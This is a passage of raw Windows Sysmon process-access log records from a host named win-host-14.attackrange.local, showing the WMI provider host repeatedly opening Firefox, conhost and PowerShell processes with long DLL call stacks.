21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151206Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-144D-60CA-3801-00000000D101}2868C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151205Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151204Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3601-00000000D101}4536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151203Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151202Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-142D-60CA-3501-00000000D101}4808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151201Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151200Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1321-60CA-1001-00000000D101}2680C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151199Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151198Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0F01-00000000D101}1408C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151197Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151196Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151195Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151194Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151193Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151192Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.217{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151191Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 